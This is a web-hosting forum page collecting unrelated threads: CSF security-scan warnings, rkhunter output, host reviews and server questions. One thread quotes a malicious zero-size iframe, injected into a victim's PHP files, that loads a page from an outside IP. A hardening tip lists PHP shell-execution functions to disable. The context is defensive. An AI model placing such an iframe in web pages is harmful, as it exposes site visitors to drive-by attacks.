Post Your CSF Score & Warnings
May 26, 2007
We were able to get the score up to 62/70. Will need the server management company's advice and help to try and get rid of more of the red warnings.
What is your score and which red warnings do you have left? Post them please.
Score: 62/70.
Will ask server management company about these red warnings:
A1. /dev/shm isn't mounted with the noexec,nosuid options (currently: none). You should consider adding a mountpoint into /etc/fstab for /dev/shm with those options
A2. You should install the mod_evasive apache module from source to help prevent DOS attacks against apache. Note that this module breaks FrontPage functionality
A3. You should modify /usr/local/lib/php.ini and set:
enable_dl = off
This prevents users from loading php modules that affect everyone on the server. Note that if use dynamic libraries, such as ioncube, you will have to load them directly in php.ini
A4. On most servers anacron isn't needed and should be stopped:
service anacron stop
chkconfig anacron off
chkconfig --del anacron
Probably going to leave these red warnings for now:
B1. For ultimate SSH security, you might want to consider disabling PasswordAuthentication and only allow access using PubkeyAuthentication. For more information read this article and this article
B2. You should modify /usr/local/lib/php.ini and disable commonly abused php functions, e.g.:
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
Some client web scripts may break with some of these functions disabled, so you may have to remove them from this list
B3. To reduce the risk of hackers accessing all sites on the server from a compromised PHP web script, you should enable phpsuexec when you build apache/php. Note that there are sideeffects when enabling phpsuexec on a server and you should be aware of these before enabling it
B4. You have package updating disabled, this can pose a security risk as OS vendor and cPanel security updates may not be applied in a timely manner WHM > Update Config >cPanel Package Updates > Automatic
View 2 Replies
ADVERTISEMENT
May 12, 2009
If you have CSF installed, under its WHM section there is a quick security 'scan' you can run - just wondering what score you have?
I know it's not an infallible test, but the scan does test for some potentially large weaknesses hence why I'm asking here (mainly out of curiosity) what sort of scores people have.
Mine is 103/112 - the rest of the points were mainly for features I didn't want enabled for particular reasons (i.e. one of the recommendations is to force all cPanel visits to be through SSL, a feature which some clients don't want) plus sometimes it says I've got features enabled which are disabled, etc.
View 12 Replies
View Related
Oct 15, 2009
If any of you are with or going with Hivelocity here are a few things we have encountered today:
We asked to cancel our Virtuozzo lisense at the end of this billing month which would be the 22nd, they then went ahead and cancelled it straight away meaning we had no backups for our VPS clients.
We then asked for them to install windows 2008 server onto our machine it took them from 12pm - 9pm to complete this.
After logging in to our billing system we find a new hard drive added to our server which one we did not ask for and two we do not need adding an extra $150 onto our server bill.
Overall today has been a real pain in the **** with them, yes I agree they are a fantastic host but the fact we have been billed for something we never asked for has completely annoyed me.
View 14 Replies
View Related
Oct 5, 2007
I was testing the new RKHunter 1.3.0, and found a few warnings:
Code:
/usr/bin/GET [ Warning ]
/usr/bin/groups [ Warning ]
/usr/bin/ldd [ Warning ]
/usr/bin/whatis [ Warning ]
/sbin/ifdown [ Warning ]
/sbin/ifup [ Warning ]
Investigating the logs found this:
Code:
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Same result in two different RHE 4 boxes... just to verify that this is a false positive , do you have the same results in your RHE 4 boxes while running "rkhunter -c" ?
View 2 Replies
View Related
Aug 25, 2007
I have a major problem with injecting iframes into every files (header.php footer.php index.php login.php and vars.php ) on all server account.
Code:
<iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
what is the reason and how to fix that ?
and I have the second problem is the rkhunter warnings I am not sure if that have relations with the first problem :
rkhunter results:
Code:
Checking system commands...
Performing 'strings' command checks
Checking 'strings' command [ OK ]
Performing 'shared libraries' checks
Checking for preloading variables [ None found ]
Checking for preload file [ Not found ]
Checking LD_LIBRARY_PATH variable [ Not found ]
Performing file properties checks
Checking for prerequisites [ Warning ]
/bin/awk [ OK ]
/bin/basename [ OK ]
/bin/bash [ OK ]
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/cp [ OK ]
/bin/csh [ OK ]
/bin/cut [ OK ]
/bin/date [ OK ]
/bin/df [ OK ]
/bin/dmesg [ OK ]
/bin/echo [ OK ]
/bin/ed [ OK ]
/bin/egrep [ OK ]
/bin/env [ OK ]
/bin/fgrep [ OK ]
/bin/grep [ OK ]
/bin/kill [ OK ]
/bin/login [ OK ]
/bin/ls [ OK ]
/bin/mail [ OK ]
/bin/mktemp [ OK ]
/bin/more [ OK ]
/bin/mount [ OK ]
/bin/mv [ OK ]
/bin/netstat [ OK ]
/bin/passwd [ OK ]
/bin/ps [ OK ]
/bin/pwd [ OK ]
/bin/rpm [ OK ]
/bin/sed [ OK ]
/bin/sh [ OK ]
/bin/sort [ OK ]
/bin/su [ OK ]
/bin/touch [ OK ]
/bin/uname [ OK ]
/bin/gawk [ OK ]
/bin/tcsh [ OK ]
/usr/bin/awk [ OK ]
/usr/bin/chattr [ OK ]
/usr/bin/curl [ OK ]
/usr/bin/cut [ OK ]
/usr/bin/diff [ OK ]
/usr/bin/dirname [ OK ]
/usr/bin/du [ OK ]
/usr/bin/env [ OK ]
/usr/bin/file [ OK ]
/usr/bin/find [ OK ]
/usr/bin/GET [ Warning ]
/usr/bin/groups [ Warning ]
/usr/bin/head [ OK ]
/usr/bin/id [ OK ]
/usr/bin/kill [ OK ]
/usr/bin/killall [ OK ]
/usr/bin/last [ OK ]
/usr/bin/lastlog [ OK ]
/usr/bin/ldd [ Warning ]
/usr/bin/less [ OK ]
/usr/bin/locate [ OK ]
/usr/bin/logger [ OK ]
/usr/bin/lsattr [ OK ]
/usr/bin/lynx [ OK ]
/usr/bin/md5sum [ OK ]
/usr/bin/newgrp [ OK ]
/usr/bin/passwd [ OK ]
/usr/bin/perl [ OK ]
/usr/bin/pstree [ OK ]
/usr/bin/readlink [ OK ]
/usr/bin/runcon [ OK ]
/usr/bin/sha1sum [ OK ]
/usr/bin/size [ OK ]
/usr/bin/slocate [ OK ]
/usr/bin/stat [ OK ]
/usr/bin/strace [ OK ]
/usr/bin/strings [ OK ]
/usr/bin/sudo [ OK ]
/usr/bin/tail [ OK ]
/usr/bin/test [ OK ]
/usr/bin/top [ OK ]
/usr/bin/tr [ OK ]
/usr/bin/uniq [ OK ]
/usr/bin/users [ OK ]
/usr/bin/vmstat [ OK ]
/usr/bin/w [ OK ]
/usr/bin/watch [ OK ]
/usr/bin/wc [ OK ]
/usr/bin/wget [ OK ]
/usr/bin/whatis [ Warning ]
/usr/bin/whereis [ OK ]
/usr/bin/which [ OK ]
/usr/bin/who [ OK ]
/usr/bin/whoami [ OK ]
/usr/bin/gawk [ OK ]
/sbin/chkconfig [ OK ]
/sbin/depmod [ OK ]
/sbin/ifconfig [ OK ]
/sbin/ifdown [ Warning ]
/sbin/ifup [ Warning ]
/sbin/init [ OK ]
/sbin/insmod [ OK ]
/sbin/ip [ OK ]
/sbin/lsmod [ OK ]
/sbin/modinfo [ OK ]
/sbin/modprobe [ OK ]
/sbin/nologin [ OK ]
/sbin/rmmod [ OK ]
/sbin/runlevel [ OK ]
/sbin/sulogin [ OK ]
/sbin/sysctl [ OK ]
/sbin/syslogd [ OK ]
/usr/sbin/adduser [ OK ]
/usr/sbin/chroot [ OK ]
/usr/sbin/groupadd [ OK ]
/usr/sbin/groupdel [ OK ]
/usr/sbin/groupmod [ OK ]
/usr/sbin/grpck [ OK ]
/usr/sbin/kudzu [ OK ]
/usr/sbin/lsof [ OK ]
/usr/sbin/prelink [ OK ]
/usr/sbin/pwck [ OK ]
/usr/sbin/tcpd [ OK ]
/usr/sbin/useradd [ OK ]
/usr/sbin/userdel [ OK ]
/usr/sbin/usermod [ OK ]
/usr/sbin/vipw [ OK ]
/usr/sbin/xinetd [ OK ]
/usr/local/bin/perl [ OK ]
/usr/local/bin/rkhunter [ OK ]
Checking for rootkits...
Performing check of known rootkit files and directories
55808 Trojan - Variant A [ Not found ]
ADM Worm [ Not found ]
AjaKit Rootkit [ Not found ]
aPa Kit [ Not found ]
Apache Worm [ Not found ]
Ambient (ark) Rootkit [ Not found ]
Balaur Rootkit [ Not found ]
BeastKit Rootkit [ Not found ]
beX2 Rootkit [ Not found ]
BOBKit Rootkit [ Not found ]
CiNIK Worm (Slapper.B variant) [ Not found ]
Danny-Boy's Abuse Kit [ Not found ]
Devil RootKit [ Not found ]
Dica-Kit Rootkit [ Not found ]
Dreams Rootkit [ Not found ]
Duarawkz Rootkit [ Not found ]
Enye LKM [ Not found ]
Flea Linux Rootkit [ Not found ]
FreeBSD Rootkit [ Not found ]
****`it Rootkit [ Not found ]
GasKit Rootkit [ Not found ]
Heroin LKM [ Not found ]
HjC Kit [ Not found ]
ignoKit Rootkit [ Not found ]
ImperalsS-FBRK Rootkit [ Not found ]
Irix Rootkit [ Not found ]
Kitko Rootkit [ Not found ]
Knark Rootkit [ Not found ]
Li0n Worm [ Not found ]
Lockit / LJK2 Rootkit [ Not found ]
Mood-NT Rootkit [ Not found ]
MRK Rootkit [ Not found ]
Ni0 Rootkit [ Not found ]
Ohhara Rootkit [ Not found ]
Optic Kit (Tux) Worm [ Not found ]
Oz Rootkit [ Not found ]
Phalanx Rootkit [ Not found ]
Phalanx Rootkit (strings) [ Not found ]
Portacelo Rootkit [ Not found ]
R3dstorm Toolkit [ Not found ]
RH-Sharpe's Rootkit [ Not found ]
RSHA's Rootkit [ Not found ]
Scalper Worm [ Not found ]
Sebek LKM [ Not found ]
Shutdown Rootkit [ Not found ]
SHV4 Rootkit [ Not found ]
SHV5 Rootkit [ Not found ]
Sin Rootkit [ Not found ]
Slapper Worm [ Not found ]
Sneakin Rootkit [ Not found ]
Suckit Rootkit [ Not found ]
SunOS Rootkit [ Not found ]
SunOS / NSDAP Rootkit [ Not found ]
Superkit Rootkit [ Not found ]
TBD (Telnet BackDoor) [ Not found ]
TeLeKiT Rootkit [ Not found ]
T0rn Rootkit [ Not found ]
Trojanit Kit [ Not found ]
Tuxtendo Rootkit [ Not found ]
URK Rootkit [ Not found ]
VcKit Rootkit [ Not found ]
Volc Rootkit [ Not found ]
X-Org SunOS Rootkit [ Not found ]
zaRwT.KiT Rootkit [ Not found ]
Performing additional rootkit checks
Suckit Rookit additional checks [ OK ]
Checking for possible rootkit files and directories [ None found ]
Checking for possible rootkit strings [ None found ]
Performing malware checks
Checking running processes for suspicious files [ None found ]
Checking for login backdoors [ None found ]
Checking for suspicious directories [ None found ]
Checking for sniffer log files [ None found ]
Performing trojan specific checks
Checking for enabled xinetd services [ None found ]
Checking for Apache backdoor [ Not found ]
Performing Linux specific checks
Checking kernel module commands [ OK ]
Checking kernel module names [ OK ]
Checking the network...
Performing check for backdoor ports
Checking for UDP port 2001 [ Not found ]
Checking for TCP port 2006 [ Not found ]
Checking for TCP port 2128 [ Not found ]
Checking for TCP port 14856 [ Not found ]
Checking for TCP port 47107 [ Not found ]
Checking for TCP port 60922 [ Not found ]
Performing checks on the network interfaces
Checking for promiscuous interfaces [ None found ]
Checking the local host...
Performing system boot checks
Checking for local host name [ Found ]
Checking for local startup files [ Found ]
Checking local startup files for malware [ None found ]
Checking system startup files for malware [ None found ]
Performing group and account checks
Checking for passwd file [ Found ]
Checking for root equivalent (UID 0) accounts [ None found ]
Checking for passwordless accounts [ None found ]
Checking for passwd file changes [ None found ]
Checking for group file changes [ None found ]
Checking root account shell history files [ OK ]
Performing system configuration file checks
Checking for SSH configuration file [ Found ]
Checking if SSH root access is allowed [ Warning ]
Checking if SSH protocol v1 is allowed [ Warning ]
Checking for running syslog daemon [ Found ]
Checking for syslog configuration file [ Found ]
Checking if syslog remote logging is allowed [ Not allowed ]
Performing filesystem checks
Checking /dev for suspicious file types [ None found ]
Checking for hidden files and directories [ Warning ]
Checking application versions...
Checking version of Exim MTA [ OK ]
Checking version of GnuPG [ Warning ]
Checking version of Apache [ Skipped ]
Checking version of Bind DNS [ OK ]
Checking version of OpenSSL [ Warning ]
Checking version of PHP [ OK ]
Checking version of Procmail MTA [ OK ]
Checking version of OpenSSH [ OK ]
System checks summary
=====================
File properties checks...
Required commands check failed
Files checked: 129
Suspect files: 6
Rootkit checks...
Rootkits checked : 114
Possible rootkits: 0
Applications checks...
Applications checked: 8
Suspect applications: 2
The system checks took: 3 minutes and 12 seconds
All results have been written to the logfile (/var/log/rkhunter.log)
One or more warnings have been found while checking the system.
Please check the log file (/var/log/rkhunter.log)
View 5 Replies
View Related
Sep 21, 2013
So I've set everything up manually a few times before now, but I got so bored of configuring everything for a manual install I just said screw it and used XAMPP this time - so my circumstances are not completely ideal.
Basically what I am looking to find out is how to improve loading speeds for Apache, PHP and MySQL on my dedi server?
The server I have is of the following spec:
Intel Xeon CPU E5-1650 V2 (3.50Ghz with 12 cores total)
64 GB DDR3 ECC
2 x 2TB SATA3 (RAID 0/1)
use Windows Web 2008 R2 so only 32GB of the RAM is usable.
With all the abive aside, here is the important part: Whilst people are browsing the websites I have configured they are random hit with a blank white page saying "Your request has timed out. Please retry the request." - I have about 100 unique hits daily and a lot of people report the same problem, and I have even had it myself.
It feels as if the server has much more power than Apache and co. is trying to utilize - what can I do?
View 4 Replies
View Related
Nov 19, 2014
Operating System: Windows Server 2008 R2 Std
Plesk: Parallels Plesk Panel 11.5
We have scheduled a server local backup via Backup Manager and found that backup has got completed with warnings.
We have checked logs from location : E:Program Files (x86)ParallelsPleskPMMsessions2014-11-18-144536.191psadump.log
8052: Warning 18/11/2014 18:18:55.028 : Exception ignored ( System.ComponentModel.Win32Exception: The system cannot find the file specified at psabackupcommon.FileUtils.DeleteFile(String fileName) at psadumpagent.ArchiveNode.doStdClose() )
8052: Debug 18/11/2014 18:18:55.028 : Add mail name 'abc@xxxx.com' directory 'F:Plesk PrivateTemp21282721-4181-4c0f-9520-c232f00b7668MailMigratorabc@xxxx.com to dump
[Code] .....
View 3 Replies
View Related
Nov 19, 2014
I get these emails every day, sometimes less warnings, but today there are plenty again:
Subject: Cron <root@plesk01> /opt/psa/admin/bin/php -c '/opt/psa/admin/conf/php.ini' -dauto_prepend_file=sdk.php '/opt/psa/admin/plib/modules/servershield/scripts/aggregate-stats.php'
Code:
PHP Notice: Undefined property: stdClass::$response; File: /opt/psa/admin/plib/modules/servershield/scripts/aggregate-stats.php, Line: 21
PHP Notice: Trying to get property of non-object; File: /opt/psa/admin/plib/modules/servershield/scripts/aggregate-stats.php, Line: 21
[Code] .....
They started showing up when I upgraded to Plesk 12 and activated the server shield extension. The server is an Ubuntu 12.04 LTS.
View 5 Replies
View Related
Sep 14, 2006
I am running on a VPS system, and I have some auction software and I run Vbulletin as well..
When someone trys to do a Private MEssage via Vbulletin using anything with the @ in it.. Like an e-mail address. And hit submit, it says " /private.php access is denied.
But it also does it when I post news in the auction site. Which leads me to believe their is something screwed up with one of the server settings.. But I dont know what?
View 6 Replies
View Related
Feb 4, 2008
Well i started off with them in december. here is my review
- Waited a week after payment for service. ticket replys "will be up tonight" or "working on it now" now came a week later.
- then when it did come online cpanel/whm licence was invalid, resulting in 4 more days of "will be fixed today" replys to my tickets
- finaly server up and whm working, fantastico licenc invalid, here foes another 5 days
- same time as fantastico: whmcs licence invalid guess how long? (had to threaten to cancel to get it)
Dispite all this when i finally got online they promised a free month for the issues, server ran great for about a week and i was happy at this point.
then ran into several small issues, ftp shutting down, site downtime, not being able to edit files and folders, nothing major just little things, but lots of them.
cron issues, RV took a week to get installed. wrong amount of ips that to this day was never corrected.
support tickets started to disapear, and respond times grew massivly, bandwidth exceeded pages sprung up daily and randomly on all mycustomers pages, and mail to this day has never worked properly.
then i get invoiced in the middle of jan for another 3 months. not only did i not have my time i paid for but didnt get the free month for the issues, at this point they try to upsell me to pay the full year at discounted price and my issues still are not fixed.
At this point im through with this, i havent spent 3+ years building the customers i have to loose 3 in 1 week due to there serice. After seeing other simmilar posts here and how they reject refunds, I was promised in both msn chat and there own ticket system they DO offer a money back guarantee and have 7 screen shots of different convos with it being guaranteed. PayPal will not interfere as its a service therefor if i do not recieve 2 of the 3 month i have paied fore i am doing a credit care charge back.
Jeff has lied far too often. We have even checked into his "Llc" which he is most definetly not. and this is illegal.
Jeff when you read this no BS responces not "we dont refund" this is not a choice for you, it is an understanding on my part that you keep one of the three months payment or i will do a 100% credit card chargeback which will result in your paypal deducting it and charging you $15 for the process. refund 2 months, and i want it this week, not next month. Dont bother deleting my tickets and email/msn convos i have everything screenshoted. your a crook, and a fraud. I cant believed that in between all this the 1 or so week it did somewhat work i actually posted positive reviews and supported/defended your business.
View 14 Replies
View Related
Jun 4, 2007
how can i forbid POST to be sent from outside website and allow it to be sent from the website of origin like if you are on domain.com POST command must be allowed only if you are sending it from taht domain/referer?
View 9 Replies
View Related
Apr 17, 2007
if there is a rule to add to firewall or mod_security to ban any IP which is sending more xx number of POST requests to the same URL?
View 6 Replies
View Related
Apr 6, 2007
In httpd-status i see that some IPs hardly sending POST command to index.php but can i somehow find out what exactly they are trying to post and into which form on that page ?
View 5 Replies
View Related
Oct 17, 2009
It's been close to a month since we've migrated away from our former provider to Gigenet, and after monitoring the activity and health of our new servers, I felt it was time to write a review.
This isn't about bashing our old partners, the data center and our former managed hosting provider. I'm leaving names out of this, and I'll appreciate it if the couple people on WHT who know our old providers keep that info to themselves, because this is not about them; it's about Gigenet.
Support
Tickets/support is about as good a place as any to start. Our old setup had all management running through our managed hosting provider, and tickets were either closed unanswered, or we might wait days to get a response, which was too often less than helpful.
Our setup now includes standard management through Gigenet, and we've contracted Rack911 to handle management of some very specialized services and security requirements we wouldn't expect Gigenet or any other data center-based management team anywhere to handle. That's another (very positive) review for another day.
During the course of migrating (five servers during three weekends), we opened perhaps 10 tickets regarding server config, IPs, provisioning certain services, etc., and the longest we had to wait for any ticket to get answered was 9 minutes. In all but one case, the first response resolved the ticket - the remaining ticket did require more back-and-forth communication, which is to be expected. Even better, instead of hearing about everything that can't be done (something we'd come to expect from our previous provider), they focused on what could be done, and they did it. Things were handled properly and professionally every time.
Best of all, I can actually call my admins or chat with them, sort out issues in minutes instead of days or months.
Hardware Performance
Despite how much happier we are with the response we're getting from our admins, this benefit pales in comparison to the performance increase we've seen since we moved.
We have a single client who accounts for three of the five servers we're hosting right now. Again, I'm leaving names out, because this is not their endorsement of Gigenet - it's our endorsement. The performance boost we've seen since moving has been nothing less than astonishing.
Of those three servers, let's consider the old Web server config:
- Xeon Quad Core, one of the mid-2008 E series
- 6GB RAM
- Public 100MBPS connection
- SATAII 250GB HD
And now the new Web server:
- Core i7 920
- 8GB RAM
- Public 100MBPS connection
- 10k Raptor 147GB x2, RAID1
So, it's a step up. Is it a significant step up? I'll leave that to hardware geeks to debate. But I don't think anyone can argue that the increase in hardware does not match the increase in performance when you look at these numbers:
Old Web Server
Typical Load: 2 - 5
High Traffic Load: Always 15+, often 40+, sometimes reaching 200+ and requiring a restart
Typical Idle: 85%
High Traffic Idle: 0%, and it could stay buried for 15-30 minutes at a time!
New Web Server:
Typical Load: .1 - .3
High Traffic Load: .5 - 1 (I've only seen it go above 1 twice)
Typical Idle: 95-100%
High Traffic Idle: 80-90%
We have even more revealing numbers from when we did some post-migration stress testing. I won't get into details here (I might be doing a more thorough write-up about this in the future), but the general conclusion was that the new server could handle 6x the traffic of the old server and still serve pages faster than the old server did even with all traffic already routed off that server.
I attribute this to three things (caveat: I'm not a hardware expert, and this is my best guess).
1) The hardware is a step up, and that will account for some performance boost.
2) Rack911 optimized this server from day one.
3) The components/build are simply higher quality.
If you happen to know the client who uses these three servers, again, please keep this info to yourself, but try surfing their site now, and you tell me whether it's faster, like maybe 3-4x faster! They've been getting quite a few people complimenting them on their site's performance over the last few weeks. I'd like to take credit for that, but I can't.
----------
So there you have it - another satisfied customer of Gigenet (and Rack911). I hope over time my experience with them continues to be the same quality it is now. We're paying a bit more than we were before (for both hosting and administration), but we're getting so much more for our money!
View 14 Replies
View Related
Mar 24, 2009
I have been a WiredTree customer for about one year and I am very happy with their services. One of the top VPS providers available on the world, WiredTree runs its servers in its own datacenter and it is the real peace in mind company. On January 15th 2008 I've started a VPS 512 in WiredTree using a a WHT promo offer and encountered not only one problem with billing, hardware, software, support!! I'm running 16 monster websites of my selected customers on this VPS under cPanel optimized for VPS release 4-R32603 - WHM 11.24.2 - X 3.9. OS: CENTOS 4.7 i686 on Virtuozzo. I've recently rebooted my VPS by command line (SSH) due a new app install exigence and this task was performed in few seconds without only one problem with cPanel!! The VPS 512 has this spec:
WiredTree Fully Managed VPS512 with Cpanel
* Intel Dual Xeon Clovertown (8 CPU Cores)
* 512MB Guaranteed SLM RAM
* 2048MB Burstable RAM
* 500GB Bandwidth (100Mbps Uplink)
* 50GB RAID-10 Disk Space
* Fully Managed - 24x7 Toll-free Phone + Helpdesk Support
* 24x7 Proactive Monitoring and Service Restoration
* ServerShield Server Hardening
* 4 Dedicated IPs
* cPanel / WHM
* Virtuozzo Power Panel
Nightly Off-Server RAID Backups included
A great point in this VPS 512 is the number os disk inodes allowed for its 50GB disk space: 10,485,760 (in generally default VZPP disk inodes for 50GB are only 600,000). Disk inodes number it is a very important item in VPS spec because with much disk inodes you can host much directories and subdirectories; if the inodes number is little you will fill an entire virtual HDD (your VPS) quickly if you are hosting websites with a long files tree.
I did my order using the verified corporate PayPal account of @Macarlo Networks, Inc. and in few hours I received a phone call from WiredTree and then, few minutes after this, the welcome e-mail with my login. WiredTree is not a reseller and control it's own NOC in Chicago, Illinois, a best point for all bandwidth requests from U.S. and other countries.
My rating after one year with WiredTree:
Uptime: 10/10
Management: 10/10
Support: 10/10
Price: 10/10
Billing: 10/10
Domain for verification: http://macarloshark.com/
For evaluate the WiredTree's VPS 512 for this review I hosted there the above referred 16 websites, all setup in few minutes by cPanel version 11.15 with Fantastico De Luxe and more...Using a tarball downloaded also in few minutes from our external backup server, in Nedw York (BQBackup) I put all 16 websites data in my VPS 512, registered in my partner Dotster, Inc. the new name servers for macarloshark.com and after the propagate proccess I started all websites just fine and in high speed, including for same extra-heawy webpages we have just for evaluations on VPSs and physical dedis.
Then I started the WHT Unixbech test on January 2009 and see the output below: ....
View 4 Replies
View Related
May 9, 2007
I've been having problems with the server company. These have been based around me getting an error 500 (SQL injections from CRITICAL to EMERGENCY) in mod_security when testing out a CMS built using PHP and MySQL.
After months of reading about internet security, SSL, XSS, mod_security docs etc. etc.
I've managed to get the 'add' page working by escaping the $_POST stuff and making things in general less dynamic in order to make the SQL statements less open to attack and avoid getting the error again.
Now I'm back to the 'edit' page and I seem to have escaped everything and basically built it in exactly the same way as the add.php page, except using different SQL and a little SQL beforehand to drag out the database entry, and I'm still getting error 500.
The error logs still claim this is a $_POST payload attack, but I can't see where this could be coming from.
Does anyone know where it is likely to be coming from (form hidden inputs, what you can/can't put in the SQL statement, anything like that)?
View 0 Replies
View Related
Apr 22, 2009
if there is anyway to block/redirect the POST request to another page using .htaccess ?
The reason is my site is getting hammer with DDOS attack where they target my index page with request like below: ....
View 5 Replies
View Related
Mar 30, 2009
Who will post your websites here hosted with faskvps or sarora?
I saw so many reviews about them, but seldom see the websites with these two hosting companies.
View 6 Replies
View Related
Dec 30, 2008
This is a 2 months update for serverboost.com hosting and i must say i was wrong when i said they are a gold hosting, because they are more than a gold hosting. I am sorry serverboost because i said that, they are your only friends in the time of need. When everything goes wrong in your website this the adress you need to remember and this only. So i thought to myself wait this is not gold. this is more than that. This is friendship and it worth more than gold. I feel like i am home , its your new family and this is worth mre than gold pireod. Experience 10/10 Bandwith 10/10 Availbility 10/10 Support 10/10 They use a datacenter in Netherlands on We-Dare network.
and remember if you think there prices is a little high just contact them in the chat and i am sure you will never go out.
my website is [url]
View 1 Replies
View Related
Oct 3, 2007
Wondering if anyone know how to install all the packages for the @Base category in the CentOS 5 install from yum. I did not check this during install and can't figure out an easy way to see and install all the packages in the @Base category.
Also tried some searching and can't seem to find a way to install package groups from yum.
View 1 Replies
View Related
Mar 20, 2007
I suspect that somebody is trying to do SQL injections on one of my websites. Is the POST information that is send using forms logged anywhere so I can read it in the same way I can read the GET requests in Apache logs?
View 6 Replies
View Related
Dec 12, 2013
I have a problem with file upload. I changed php.ini files in /etc/php5/cgi and user and php.ini to work with big files. I changed accordingly max_filesize, post_max_size, memory_limit.Also changed suhosin memory_limit and some other stuffs. I cant get files bigger than ~100MB to be sent through forms with post! Below is ok.Is there any method to do this with plesk 11.5?? I saw docs on this particular topics with plesk 10 on internet but nothing for plesk 11.
View 8 Replies
View Related
